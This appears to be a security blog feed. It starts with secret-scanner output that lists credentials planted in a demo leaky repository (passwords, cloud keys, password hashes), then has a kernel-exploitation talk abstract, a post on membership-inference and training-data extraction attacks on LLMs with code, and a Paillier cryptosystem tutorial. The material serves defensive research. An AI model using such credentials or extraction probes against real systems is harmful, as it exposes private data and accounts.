/private/tmp/demo/leaky-repo/web/var/www/.env:23:PASSWORD:Rule:57:REDIS_PASSWORD=:RedisPass1!:
/private/tmp/demo/leaky-repo/web/var/www/.env:33:PASSWORD:Rule:57:MAIL_PASSWORD=:Mailpass1234!:
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:20:PASSWORD:Rule:60:DB_PASSWORD', ':admin:' );
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:33:PASSWORD:Rule:61:AUTH_KEY',         ':MW1pxMctoyA(>M%0Vl: 2(#o0|2$cB+K|.G$hB~4`Juw@]:(5;oVUl<<W3^e_R-fg');
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:35:PASSWORD:Rule:61:SECURE_AUTH_KEY',  ':Y>Y9.5Ch0-3cq|=vbus[IeF(OJ9yZ|SQ#:iG;NSa+GJmj: _1Ed(cVZ7r#+JMlA,S');
/private/tmp/demo/leaky-repo/web/var/www/public_html/wp-config.php:37:PASSWORD:Rule:61:LOGGED_IN_KEY',    ':Q$:B]zZjN-AdT<>h7V1.vm+k^|}2wVZf]Xw#QEZ[-pSohv+Kj0W-Z|:|g$-+E8:8:');
/private/tmp/demo/leaky-repo/web/var/www/public_html/.htpasswd:1:PASSWORD:Rule:58:admin::$apr1$tp8glkbm$fjg65tI1eipoBh62aEjIy0:
/private/tmp/demo/leaky-repo/web/var/www/public_html/config.php:11:PASSWORD:Rule:59:$dbpasswd = ':pass123:';	
/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:14:PASSWORD:Rule:55:secret_key_base: :e0ec946fcefea5ce0d4d924f3c8db11dffeb7d10b320a69133c47a9641ab7d204d22c94f10c1ce1e187c643805fec5b2d2ba322c17bac533c110e6c6378ba84c:
/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:17:PASSWORD:Rule:55:secret_key_base: :96dc2e349b1236b9e5915f1526b5e28e19a6557a88026007632c6c11da7cb5952ae55c520eb0d6fa78b972cbe8e855887f539edea5f969636792e54469e3c96e:
/private/tmp/demo/leaky-repo/web/ruby/secrets.yml:22:PASSWORD:Rule:55:secret_key_base: :8969518770d7484053e72f09c7bd37995d79c320e618ce3ec7a44b7c43fafff1615622a01513789bff7ac7a5201c6382bb6851632c8aa63e76bf0f0a01ed0e17:
/private/tmp/demo/leaky-repo/etc/shadow:20:PASSWORD:Rule:67:ubuntu::$6$LnUhhUi45srUKt9i$4Hp6VRTOB2mxvsYH8mwsCfBryg6hCbm4JJjV26KplN8ewZ7EUVqQDkLKDW.O8XRHx.B76JkwXtyD3wnAXEuZN1:0:99999:7::::
/private/tmp/demo/leaky-repo/cloud/.s3cfg:1:PASSWORD:Rule:28:secret_key = :yLryKGwcGc3ez9G8YAnjeYMQOc: 
/private/tmp/demo/leaky-repo/cloud/.s3cfg:2:PASSWORD:Rule:28:access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX: 
/private/tmp/demo/leaky-repo/cloud/.tugboat:4:PASSWORD:Rule:63:api_key: :3b6311afca5bd8aac647b316704e9c6d: # Risk.
/private/tmp/demo/leaky-repo/cloud/.credentials:4:PASSWORD:Rule:28:aws_secret_access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/cloud/.credentials:7:PASSWORD:Rule:28:aws_secret_access_key = :nAH2VzKrMrRjySLlt8HCdFU3tM2TUuUZgh39NX:
/private/tmp/demo/leaky-repo/cloud/heroku.json:4:PASSWORD:Rule:29:      "HEROKU_API_KEY": ":7a2f9a4289e530bef6dbf31f4cbf63d5:"
/private/tmp/demo/leaky-repo/db/robomongo.json:14:PASSWORD:Rule:65:userPassword" : ":mongopass:"
/private/tmp/demo/leaky-repo/db/robomongo.json:22:PASSWORD:Rule:66:sshPassphrase" : ":SSHPass123:",
/private/tmp/demo/leaky-repo/db/robomongo.json:27:PASSWORD:Rule:65:sshUserPassword" : ":roboMongoSSHPass:",
/private/tmp/demo/leaky-repo/db/mongoid.yml:4:PASSWORD:Rule:4:      uri: "mongodb://testuser::testpass:@ds048537.mongolab.com:48537/main"
/private/tmp/demo/leaky-repo/db/dump.sql:32:PASSWORD:Rule:64:(1, 'rogers63', ':$2y$12$s.YfVZdfvAuO/Iz6fte5iO..ZbbEgreZnDcYOGvX4NGJskYQIstcG:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:33:PASSWORD:Rule:64:(2, 'mike28', ':$2y$12$Sq//4hEpn1z91c3I/iU67.rqaHNtD3ucwG0Ncx7vOsHST4Jsr2Q0C:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:34:PASSWORD:Rule:64:(3, 'rivera92', ':$2y$12$3iskP41QVYgh2GFesX2Rpe0DstoL9GpIsvYxM4VI24jcILuCha3O2:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:35:PASSWORD:Rule:64:(4, 'ross95', ':$2y$12$hnktY9dEP/LexZjZ5b9B7ubzgxjO2393dWDaregvwPPaiRicOYkpu:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:36:PASSWORD:Rule:64:(5, 'paul85', ':$2y$12$M593ZP8u9pOnJiBIUbyW1.r8KfCy8uv9UCgDlX2oj3OtHmibEsQie:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:37:PASSWORD:Rule:64:(6, 'smith34', ':$2y$12$GEu9AWgT/Jf9Kgj/WEUanOkoa5OBC6W4cPkGeuVyROcS9T1U6orX.:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:38:PASSWORD:Rule:64:(7, 'james84', ':$2y$12$hjrJNp/UijB4YKg5rMhDeOoqUT5Oe2T7pTfxCEgyfgYtrHC5ph36W:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:39:PASSWORD:Rule:64:(8, 'daniel53', ':$2y$12$lipAFqG0QyyYKa.S16oTNOdFgkr3svEUx7JOl1HYU4m03oYFq89Uq:', 1),
/private/tmp/demo/leaky-repo/db/dump.sql:40:PASSWORD:Rule:64:(9, 'brooks80', ':$2y$12$/jJGIYh9wizWMFIcu79TEucXzYtvRdn3YxUpGUKnoZT1B6Gv2taSm:', 0),
/private/tmp/demo/leaky-repo/db/dump.sql:41:PASSWORD:Rule:64:(10, 'morgan65', ':$2y$12$kZ55ticjwXD9d/A5o3y8..fA7/1qycT2befZ4QrCjJCfrxk415gUy:', 1);
/private/tmp/demo/leaky-repo/.vscode/sftp.json:6:PASSWORD:Rule:19:    "password": ":swordfish!23:"
/private/tmp/demo/leaky-repo/filezilla/recentservers.xml:13:PASSWORD:Rule:69:			<Pass encoding="base64">:NjllNWU5ZWMwZDU0MmU5Y2QwOTY4MWM5YzZhMDdkYWVmNjg3OWE3MDMzM2Q4MWJmCg==:</Pass>
/private/tmp/demo/leaky-repo/filezilla/recentservers.xml:30:PASSWORD:Rule:69:			<Pass encoding="base64">:NjllNWU5ZWMwZDU0MmU5Y2QwOTY4MWM5YzZhMDdkYWVmNjg3OWE3MDMzM2Q4MWJmCg==:</Pass>
/private/tmp/demo/leaky-repo/.idea/WebServers.xml:6:PASSWORD:Rule:17:        <fileTransfer host="example.com" port="21" password=":dff9dfdfdfdadfcfdfd8dff9dfcfdfcfdfc9dfd8dfcfdfdedffadfcbdfd9dfd9dfdddfc5dfd8dfcedf8b:" username="root">
CCS: Credentials were found
[email protected] % 

OffensiveCon 2023 – Exploit Engineering – Attacking the Linux Kernel

23 May 2023 at 12:17

Cedric Halbronn and Alex Plaskett presented at OffensiveCon on the 19th of May 2023 on Exploit Engineering – Attacking the Linux kernel.

Slides

The slides for the talk can be downloaded below:

libslub

libslub can be downloaded from here.

Abstract

The abstract for the talk was as follows:

Over the last year the Exploit Development Group (EDG) at NCC Group found and exploited three different 0-day Linux kernel local privilege escalation vulnerabilities (CVE-2022-0185, CVE-2022-0995, CVE-2022-32250) against fully patched OSs with all mitigations enabled. The most recent vulnerability was patched against versions of the kernel going back 6 years affecting most stable Linux distributions.

Unlike developing proof of concepts, our exploits need to be ultra-reliable and support many different OS variations and kernel versions so they can be used by our security assessment consultants or Red Teams. This calls for a much more rigorous engineering process to be followed.

In this talk, we start with an overview of our bug hunting processes and approach to rapidly find high impact vulnerabilities within the Linux kernel. The talk will then describe key vulnerability details, discuss the challenges of reliable exploitation across multiple targets and describe the exploitation techniques used (and what is appropriate in 2023). We discuss rigorous exploit engineering approaches – including tooling which we have developed for heap analysis (libslub) and automation for mining, creation, deployment and scaling across many different environments (TargetMob). Finally, we will conclude with our thoughts on areas where more strategic hardening and attack surface reduction can be introduced to hinder against advanced attackers using 0-days in the Linux kernel. We will leave you with a release of our tooling for heap analysis (libslub) and the knowledge to go out there and find, analyse and exploit your own Linux kernel vulnerabilities!

Exploring Overfitting Risks in Large Language Models

22 May 2023 at 21:16

In the following blog post, we explore how overfitting can affect Large Language Models (LLMs) in particular, since this technology is used in the most promising AI technologies we see today (chatGPT, LLaMa, Bard, etc). Furthermore, by exploring the likelihood of inferring data from the dataset, we will determine how much we can trust these kind of models to not reproduce copyrighted content that existed in their training dataset, which is another risk associated with overfitting.

Overfitting is a concept used in the ML field that refers to the situation where the model fits the training data so well that it cannot generalise its predictions for unseen data. Although this may not be the perfect explanation for a data scientist, we could say that a model with good generalisation is “understanding” a problem. In contrast, an overfitted model is “memorising” the training dataset. In the real world, data scientists try to find a balance where the model generalises well enough, even if some overfitting exists.

As we have seen in most ML models, overfitting can be abused to perform certain attacks such as Membership Inference Attacks (MIAs), among other risks. In MIAs, attackers infer if a piece of data belongs to the training dataset by observing the predictions generated by the model. So, for example, in an image classification problem, a picture of a cat that was used in the training process will be predicted as “cat” with a higher probability than other pictures of cats that were not used in the training process, because that small degree of overfitting that most models have.

Overfitting in LLMs

Most of the LLMs we see today predict a new token (usually a small piece of a word) based on a given sequence of tokens (typically, an input text). Under the hood, the model generates a probability for each one of the tokens that could be generated (the “vocabulary” of the model). As an example, the design of Databricks’ Dolly2 model, as it is implemented in HuggingFace, is following:

GPTNeoXForCausalLM(
  (gpt_neox): GPTNeoXModel(
    (embed_in): Embedding(50280, 2560)
    (layers): ModuleList(
      (0-31): 32 x GPTNeoXLayer(
        (input_layernorm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
        (post_attention_layernorm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
        (attention): GPTNeoXAttention(
          (rotary_emb): RotaryEmbedding()
          (query_key_value): Linear(in_features=2560, out_features=7680, bias=True)
          (dense): Linear(in_features=2560, out_features=2560, bias=True)
        )
        (mlp): GPTNeoXMLP(
          (dense_h_to_4h): Linear(in_features=2560, out_features=10240, bias=True)
          (dense_4h_to_h): Linear(in_features=10240, out_features=2560, bias=True)
          (act): GELUActivation()
        )
      )
    )
    (final_layer_norm): LayerNorm((2560,), eps=1e-05, elementwise_affine=True)
  )
  (embed_out): Linear(in_features=2560, out_features=50280, bias=False)
)

The “out_features” are 50280 probabilities/scores, one for each possible token from the vocabulary. Based on the training dataset this model was exposed to, they show the likelihood of the next token to be predicted. Then, one of the tokens with the highest score is chosen, based on parameters such as “temperature” or “Top P”, which is generally shown as the next generated token.

However, models also allow you to inspect those scores, with independence of the chosen token. For example, the code snippet below shows how the HuggingFace model “databricks/dolly-v2-3b” was parametrized to show the complete score information.

prompt_text = "Do or do"
inputs = tokenizer(prompt_text, return_tensors="pt")
input_ids = inputs["input_ids"]

x = model.generate(
    input_ids=input_ids.to(model.device),
    attention_mask = torch.ones(input_ids.size(0), input_ids.size(1)),
    pad_token_id=tokenizer.eos_token_id,
    return_dict_in_generate=True,
    output_scores=True,
    max_new_tokens=1
)

next_id = x.sequences[0][-1]
print_top_scores(prompt_text, x.scores, next_id)

Although the implementation of “print_top_scores()” is not shown for clarity, it shows the top 10 candidates for the next token with their corresponding normalised scores:

Do or do not	(0.9855502843856812)
Do or do-		(0.0074768210761249)
Do or do NOT	(0.0016151140443980)
Do or do N	(0.0005388919962570)
Do or do_		(0.0003805902961175)
Do or do or	(0.0003312885237392)
Do or do you	(0.0003257314674556)
Do or do Not	(0.0002487517194822)
Do or do (	(0.0002326328831259)
Do or do \n	(0.0002092608920065)

Based on this information, “ not” (yes, beginning with whitespace) seems to have the highest score and, if we continue generating tokens, we obtain the following text.

InputTop 3 Probs (Dolly2)
Do or do notDo or do not, (0.30009099)
Do or do not do (0.17540030)
Do or do not. (0.13311417)
Do or do not,Do or do not, but (0.25922420)
Do or do not, there (0.23855654)
Do or do not, the (0.07641381)
Do or do not, thereDo or do not, there is (0.99556446)
Do or do not, there’s (0.00221653)
Do or do not, there are (0.00051577)
Do or do not, there isDo or do not, there is no (0.97057723)
Do or do not, there is a (0.01224006)
Do or do not, there is more (0.00181120)
Do or do not, there is noDo or do not, there is no try (0.74742728)
Do or do not, there is no ‘ (0.09734915)
Do or do not, there is no ” (0.08001318)

The “Do or do not, there is no try”, obviously part of the training dataset as a mythic Star Wars quote, was generated from the “Do or do” input text. Have you seen where we cheated? Certainly, “Do or do not, but” had a slightly higher score than “Do or do not, there”, but they were very similar. That happened because both sentences (or pieces of sentences) probably belonged to the training dataset. We will talk more about this later.

Will that happen with every single LLM or just Dolly2? Let’s see an example using the “gpt2” model, also hosted in Huggingface.

Do or do not do.	(0.0317150019109249)
Do or do not you	(0.0290195103734731)
Do or do not use	(0.0278038661926984)
Do or do not have	(0.0234157051891088)
Do or do not.		(0.0197649933397769)
Do or do not take	(0.0186729021370410)
Do or do not get	(0.0179356448352336)
Do or do not buy	(0.0150753539055585)
Do or do not make	(0.0147862508893013)
Do or do not,		(0.0139999818056821)

As you can see, it is much more challenging to detect which of the next token candidates corresponds to the training dataset. Although they (in red) are still in the top 10 of the highest scores, they are not even in the top 3.

We find the complete opposite situation with OpenAI’s Playground, model “text-davinvi-003” (GPT-3) and temperature equal to zero (always choose the more probable next token).

“text-davinci-003” generating overfitted text

We can see how the target sentence was generated. Although the Playground supports providing the detailed probabilities for each token, it was not necessary at this time, since we found that the tokens for the target text were always the candidates with the highest scores.

This is just an example, not a complete and detailed analysis, but it illustrates perfectly how overfitting usually impacts more on bigger models: As a reference, this is the size of the above mentioned models in billions of parameters: GPT-3 (175b), Dolly2 (3b) and GPT-2 (1.5b).

Membership Inference

As shown above, detecting which token may correspond to overfitted data is not always easy, so we tried several additional experiments to find an effective way to exploit Membership Inference Attacks (MIA) in LLMs. Although we tried other methods, the technique used in the Beam Search generation strategy was also the most effective for MIAs. This technique calculates a probability of a sequence of tokens as a product of each token’s probability. As new tokens are generated, the N highest probability sequences are kept. Let’s see an example with our target quote: “Do or do not, there is no try”.

Beam Search Tree

The graph above shows candidate tokens and their probability for each step. Some nodes with very low probabilities have not been represented to facilitate analysis, but remember that the top 3 scores for each next candidate token were generated.

The path in blue represents the “Greedy Search” result, which means always choosing the more probable candidate token on every step (in the absence of “temperature”). The sentence “Do or do not, but do not tell” is generated in our example. However, you can easily see that the path in red (“Do or do not, there is no try”) has higher probabilities in all the sequence, except in the first element. If we calculate the overall probability for the red path, it will be 0.17, much higher than the blue path, which is 0.01. This happens because, although there were other potential tokens with high probability at some point, an overfitted sentence should have high probabilities (not necessarily the highest, but consistently high ones) for every single token.

As this technique is already implemented in LLMs to generate more natural text, we can easily obtain a list of the most probable sequences using this approach. For example, in the following code snippet, we generate tokens using a beam size of 10 (we keep the sequences of the 10 highest probabilities) and obtain all of them after the last step.

x = model.generate(
    input_ids=input_ids.to(model.device),
    attention_mask = torch.ones(input_ids.size(0), input_ids.size(1)),
    pad_token_id=tokenizer.eos_token_id,
    num_beams=10,
    num_return_sequences=10,
    early_stopping=True,
    max_new_tokens=6
)

We can add a little bit more code to calculate the final probability, since that is not given by default, and we will obtain the following results:

Do or do not, there is no try		(0.050955554860769010)
Do or do not; there is no try		(0.025580763711396462)
Do or do not, there is no '		(0.006636739833931039)
Do or do not, but do it well		(0.005970277809022071)
Do or do not, there is no "		(0.005454866792928952)
Do or do not; there is no "		(0.005357746163965427)
Do or do not, but do or do		(0.005282247360819922)
Do or do not; there is no '		(0.004159457944373084)
Do or do not, but do so quickly	(0.003438846991493329)
Do or do not, but do not tell		(0.001629174555881396)

The two results with higher probabilities are the same sentence, with some minor variations, which makes sense given that it is a transcription of a movie and could have been written differently.

Unfortunately, this technique still doesn’t work to exploit MIAs in smaller language models such as GPT-2.

It is worth mentioning that datasets used to train base models are typically built by collecting public text data from the Internet, so the impact of exploiting an MIA is low. However, the impact increases if the base model is fine-tuned using a private and sensitive dataset that should not be exposed.

Copyrighted Material

Another side effect of overfitting in generative models is that they can generate copyrighted material. As happened before, in theory, the bigger a model is, the more likely this may happen.

In the screenshot below, we see OpenAI’s Playground (“temperature” set to 0) reproducing the beginning of the well-known novel “The Lord of the Rings” after several words matching that beginning.

“text-davinci-003” generating copyrighted text

As can be observed in the probabilities of each token (2 examples are shown), the likelihood of generating copyrighted material increases after each new token is generated. After a few tokens are generated, the following tokens follow the target sequence with probabilities higher than 90-95%, so it is likely reproducing copyrighted material. However, the likelihood of the model generating copyrighted material from scratch is much lower.

Conclusions and Recommendations

Overfitting is definitely a risk also in LLMs, especially in larger models. However, its impact strongly depends on the model’s purpose. For example, producing copyrighted material or leaking information from the training dataset may be security problems, depending on how the model is used.

Models trained with sensitive material should avoid providing verbose information such as the list of candidate next tokens and their probabilities. This information is helpful for debugging, but it facilitates MIAs. Also, deploy rate limiting controls, since exploiting this kind of attack requires massive generation requests. Finally, if possible, don’t let users set parameters other than the input text.

For models generating output that may be used as original content, it is recommended to keep high “temperature” and low “num_beams” (“best of” in OpenAI’s Playground). Also, models can be fine-tuned to cite the original author when reproducing copyrighted material, as chatGPT does. Other heuristic controls may also be deployed to guarantee that no copyrighted material is produced.

chatGPT citing copyrighted text

Acknowledgements

Special thanks to Chris Anley, Eric Schorn and the rest of the NCC Group team that proofread this blogpost before being published.

The Paillier Cryptosystem with Applications to Threshold ECDSA

19 May 2023 at 14:41

You may have heard of RSA (b. 1977), but have you heard of its cousin, Paillier (b. 1999)? In this post, we provide a close look at the Paillier homomorphic encryption scheme [Paillier1999], what it offers, how it’s used in complex protocols, and how to implement it securely.

Contents

RSA Encryption Refresher and Notation

We’ll start with a review of RSA encryption and two related functions: Euler’s phi function \phi(x) and Carmichael’s lambda function \lambda(x).

RSA works in a group \mathbb{Z}^\star_{n} where n = p\cdot q is a product of two distinct primes (also called a biprime or an RSA prime). Both plaintexts and ciphertexts are in this group.

For any integer x \geq 1, \mathbb{Z}^\star_{x} is the set of integers less than and co-prime to x and it always forms a multiplicative group called the group of units modulo \mathbf{x}. An integer less than and co-prime to x is called a totative of x.

The primes p and q should be chosen independently and randomly. RSA moduli don’t need to be generated with safe primes or strong primes; two random primes are fine. (In 1999, Rivest and Silverman published an article titled “Are ‘Strong Primes’ Needed for RSA?” (PDF) in which they argued that it is unnecessary to use strong primes.)

The number of elements in \mathbb{Z}^\star_{n} is, by definition, \phi(n).

For any integer x \geq 1, \phi(x) is Euler’s phi (or totient) function, defined as the number of totatives of x (i.e., positive integers less than or equal to x that are co-prime to it). Euler’s phi function is a multiplicative function: if x_1 and x_2 are co-prime, then \phi(x_1 \cdot x_2) = \phi(x_1) \cdot \phi(x_2).

In the RSA setting, n = p\cdot q is a product of two distinct primes, so the size of \mathbb{Z}^\star_{n} is \phi(n) = \phi(p) \cdot \phi(q) = (p-1)(q-1).

The RSA cryptosystem uses a public encryption exponent e and a private decryption exponent d. Encrypting a message m \in \mathbb{Z}^\star_{n} is done by computing m^e \mod n, and decrypting a ciphertext c \in \mathbb{Z}^\star_{n} is done by computing c^d \mod n. For these operations to be correct, they must be inverses of each other: it’s required that m^{ed} \equiv m \mod n for all m \in \mathbb{Z}^\star_{n}. In other words, e and d must satisfy e\cdot d \equiv 1 \mod \text{order}_{n}(m) for every possible message m \in \mathbb{Z}^\star_{n}.

The order \text{order}_{x}(a) of an integer a modulo x is the smallest positive integer k such that a^k \equiv 1 \mod x (or undefined if no such k exists, but this case won’t arise in this blog post).

For RSA decryption and encryption to be correct for all possible messages m \in \mathbb{Z}^\star_{n}, it is necessary and sufficient for the product e\cdot d to be congruent to 1 modulo \lambda(n).

For any integer x \geq 1, \lambda(x) is Carmichael’s lambda (or least universal exponent) function, defined as the smallest positive integer k such that a^k \equiv 1 \mod x for all totatives a \in \mathbb{Z}^\star_{x}. It is the least common multiple of the orders of all elements in \mathbb{Z}^\star_{x}, so it is always less than or equal to the order of the group, \phi(x). If (and only if) \lambda(x) = \phi(x), then the group \mathbb{Z}^\star_{x} has a generator. (See the first definition of the Carmichael function at Wolfram MathWorld.)

Unlike Euler’s phi function, Carmichael’s lambda function is not quite a multiplicative function, but it satisfies a similar property: if x_1 and x_2 are co-prime, then \lambda(x_1 \cdot x_2) = LCM(\lambda(x_1), \lambda(x_2)), where LCM() is the least common multiple function. It turns out that if x is a power of an odd prime, say x=p^a, then \lambda(x) = \phi(x). (The value of \lambda(p^a) for p = 2 is slightly different: it is either \phi(p^a) for a \leq 2, or \frac{1}{2} \phi(p^a) for a \geq 3, but this fact won’t be used in this post.)

Just as \phi(x) can be efficiently computed when x’s factorization into prime powers is known, \lambda(x) can also be efficiently computed based on x’s factorization into prime powers.

You may have learned RSA encryption with the requirement that e\cdot d \equiv 1 modulo \phi(n) instead of modulo \lambda(n) — this is how I learned it too. Although this condition with Euler’s phi function is sufficient for correctness (since \lambda(n) always divides \phi(n)), it is not necessary (since \lambda(n) is always at most \phi(n)).

In this post, only two values of the Carmichael lambda function will arise: \lambda(n) and \lambda(n^2), for n = p\cdot q with odd primes p and q. Their values are \lambda(n) = LCM(p-1, q-1) and \lambda(n^2) = LCM(\lambda(p^2), \lambda(q^2)) = LCM(p(p-1), q(q-1)) = n\cdot \lambda(n).

The Computational Composite Residuosity Class Problem

RSA encryption is effective at hiding data because it’s believed to be hard to find eth roots modulo a product of two primes, n = p\cdot q. This is (rather redundantly) called the RSA problem.

Let n = p\cdot q be a biprime and let e be an integer greater than 2 in \mathbb{Z}^\star_{\phi(n)}. The RSA problem is to solve the equation y \equiv x^e \mod n for x given a random y \in \mathbb{Z}^\star_{n}.

For Paillier encryption, we again consider some integer n = p\cdot q that is a product of two primes, with the additional requirement that GCD(n, \phi(n)) = 1. An easy way to guarantee this requirement is satisfied is to choose p and q to have the same bitlength (i.e., to have their most significant bit in the same position). Instead of working with ciphertexts that are integers modulo n as in RSA, Paillier ciphertexts are integers modulo n^2. Specifically, Paillier ciphertexts are in \mathbb{Z}^\star_{n^2}, the group of units modulo n^2, which has order \phi(n^2) = n \cdot \phi(n) for a biprime n.

There are multiple ways to think of the set of integers in this group. Here’s a non-obvious one: for an appropriate choice of base g (having a particular property, as we will explain soon), each integer w in \mathbb{Z}^\star_{n^2} corresponds to a pair of integers (x,y), where x is in \mathbb{Z}_{n}, y is in the group of units \mathbb{Z}^\star_{n}, and w = g^x \cdot y^n \mod n^2.

While it’s easy to compute w given a pair (x,y) for a fixed base g modulo n, it’s believed to be hard to compute the unique, corresponding pair (x,y) for a particular w without some additional information.

Not every possible value of g \in \mathbb{Z}^\star_{n^2} is an appropriate base; g must be chosen so that for every w in \mathbb{Z}^\star_{n^2}, there is exactly one pair (x,y) in (\mathbb{Z}_{n}, \mathbb{Z}^\star_{n}) such that w = g^x \cdot y^n \mod n^2. It turns out (see Lemma 3 of [Paillier1999]) that we get this property exactly when g is an element of \mathbb{Z}^\star_{n^2} whose order is a (non-zero) multiple of n. Since the order of any element in \mathbb{Z}^\star_{n^2} is at most \lambda(n^2) = n\cdot \lambda(n), bases are those elements with orders in { n, 2n, 3n, \ldots, \lambda(n)\cdot n }. (There isn’t necessarily a base with each of these orders; the order of any element in \mathbb{Z}^\star_{n^2} must divide \lambda(n^2) = p\cdot q\cdot LCM(p-1,q-1).)

In other words, g \in \mathbb{Z}^\star_{n^2} is an appropriate base when there’s a (non-zero) multiple m of n such that g^{m\cdot n} \equiv 1 \mod n^2, but g^{i} \not\equiv 1 \mod n^2 for any positive integer i < mn.

For some biprime n=p\cdot q, g \in \mathbb{Z}^\star_{n^2} is called a base if its order modulo n^2 is a non-zero multiple of n.

With such a base, the correspondence between a w \in \mathbb{Z}^\star_{n^2} and some (x,y) \in (\mathbb{Z}_{n}, \mathbb{Z}^\star_{n}) is a proper bijection. Although this post won’t prove that the mapping yields a bijection, you can do a quick, reassuring check that both groups have the same size, n\cdot \phi(n). (For the full proof, see Lemma 3 of [Paillier1999]). The first element of the pair, x, is called the \mathbf{n}th residuosity class of \mathbf{w} with respect to g and Paillier is effective at hiding data because computing it is believed to be a hard problem.

Let n=p\cdot q be a biprime and let g \in \mathbb{Z}^\star_{n^2} be a base. Given n, g, and a random value w \in \mathbb{Z}^\star_{n^2}, the composite residuosity class problem is to compute the unique x \in \mathbb{Z}_{n} such that w = g^x \cdot y^n \mod n^2 for some y \in \mathbb{Z}^\star_{n}.

There are many potential bases g \in \mathbb{Z}^\star_{n^2} having orders modulo n^2 that are non-zero multiple of n. However, there’s no need to run a complex algorithm to identify one due to a nice property of the set of potential bases: the hardness of computing the residuosity class of a random w modulo n^2 relative to some base g doesn’t actually depend on the choice of g! (For the proof, see Lemma 7 of [Paillier1999].) A common choice of base is g = 1+n, which has order n, because it allows optimizations during encryption and decryption.

The Paillier Cryptosystem

The Paillier cryptosystem is built so that decrypting a ciphertext corresponds to solving the computational composite residuosity class problem. First, we’ll go over the mechanics of key generation, encryption, and decryption, and then we’ll dive in to how decryption works and explain the trick that allows doing it efficiently.

Key generation. Pick two primes p and q of the same bitlength independently at random. Let n=p\cdot q be their product. Choose a base g \in \mathbb{Z}^\star_{n^2} whose order is a non-zero multiple of n, e.g., g=1+n. Compute the Carmichael lambda function of n: \lambda(n)=LCM(p-1,q-1). The public key is (n, g) and the private key is \lambda(n).

Encryption of a message \mathbf{m} \in {\mathbb{Z}}_{n}. Pick a random integer y \in \mathbb{Z}^\star_{n} and compute the ciphertext c = g^m \cdot y^n \bmod n^2.

Decryption of a ciphertext \mathbf{c} \in \mathbb{Z}^\star_{n^2}. Compute the two values c_{dividend} = ((c^{\lambda(n)} \mod n^2) - 1)/n and c_{divisor} = ((g^{\lambda(n)} \mod n^2) - 1)/n. Then, compute the resulting message m = c_{dividend} / c_{divisor} \mod n.

One of the brilliant properties of Paillier’s scheme is that knowing the factorization of n allows efficiently computing composite residuosity classes: calculating \lambda(n) gives a trapdoor for computing the necessary discrete logarithm.

Recall that, for a base g, any c \in \mathbb{Z}^\star_{n^2} can be written as g^x \cdot y^n for a unique pair of x \in \mathbb{Z}_n and y \in \mathbb{Z}^\star_{n} — these x and y values just aren’t known yet. Decryption has three implicit sub-steps: cancelling out the random value y, bringing the plaintext x down from the exponent, and isolating x from values that depend on the base g.

  1. Cancelling out the random value y is straightforward when n is a biprime.
    Since the least universal exponent modulo n^2 is \lambda(n^2) = n\cdot \lambda(n), raising c \in \mathbb{Z}^\star_{n^2} to the power of \lambda(n) modulo n^2 yields g^{x \cdot \lambda(n)} \mod n^2 for some not-yet-known x \mod n, because (y^n)^{\lambda(n)} \equiv 1 \mod n^2.
  2. Next, we observe that the exponentiation in step 1 was enough to bring x down from the exponent.
    Raising any element to the power of \lambda(n) modulo n^2 yields something called an \mathbf{n}th root of unity modulo \mathbf{n^2}. This is an element that, when raised to the power of n, yields 1 — in other words, its order must be either 1, p, q, or n. This follows from the definition of the least universal exponent, \lambda(n^2) = n\cdot \lambda(n). These nth roots of unity modulo n^2 all have a particular form: they can be written as 1 + k\cdot n for some k \in \mathbb{Z}_n. To partially convince yourself this is true, observe that applying binomial expansion to (1 + k\cdot n)^n modulo n^2 gives 1. (See Section 2 in [Paillier1999].) So, g^{\lambda(n)} \mod n^2 is an nth root of unity and can be written as 1 + k\cdot n for some k \in \mathbb{Z}_n. The result of step 1 (g^{x \cdot \lambda(n)} \mod n^2) can therefore be written as (1 + k\cdot n)^x \mod n^2 for some k \in \mathbb{Z}_n. By applying binomial expansion once more, we see that it can be written as 1 + k\cdot x\cdot n \mod n^2. By subtracting 1 and dividing by n (over the integers), we get the value of the dividend in the description of decryption above: c_{dividend} = ((c^{\lambda(n)} \mod n^2) - 1)/n = k\cdot x.
  3. Finally, we need to isolate x by dividing by k (modulo n).
    The value of k depends only on the base g: g^{\lambda(n)} \equiv 1 + k\cdot n \mod n^2, so k = ((g^{\lambda(n)} \mod n^2) - 1)/n. This is the value of c_{divisor} in the description of decryption. The last step of decryption is to compute x = c_{dividend} / c_{divisor} \mod n.

Security and Homomorphic Properties

Paillier encryption effectively hides data (the messages m \in \mathbb{Z}_{n}) assuming that computing the nth residuosity classes of ciphertexts is hard. More strongly, and more formally, Paillier ciphertexts are indistinguishable under chosen plaintext attacks (IND-CPA) assuming that deciding whether the nth residuosity class of a ciphertext equals some given value is hard. (See Theorem 15 in [Paillier1999].)

However, Paillier ciphertexts cannot be indistinguishable under chosen ciphertext attacks (IND-CCA) because of the scheme’s homomorphic properties. In general, a homomorphic encryption scheme is one that allows certain operations to be performed on ciphertexts such that the resulting ciphertexts contain the encrypted result. Paillier encryption is additively homomorphic:

\text{Encrypt}_{(n,g)}(m_1) \cdot \text{Encrypt}_{(n,g)}(m_2) \equiv \text{Encrypt}_{(n,g)}(m_1 + m_2 \mod n) \mod n^2

and

(\text{Encrypt}_{(n,g)}(m))^c \equiv \text{Encrypt}_{(n,g)}(m \cdot c \mod n) \mod n^2.

The first equation above says that multiplication of ciphertexts modulo n^2 corresponds to addition of plaintexts modulo n. The second equation says that exponentiation of a ciphertext to a constant modulo n^2 corresponds to multiplication of a plaintext by a constant modulo n.

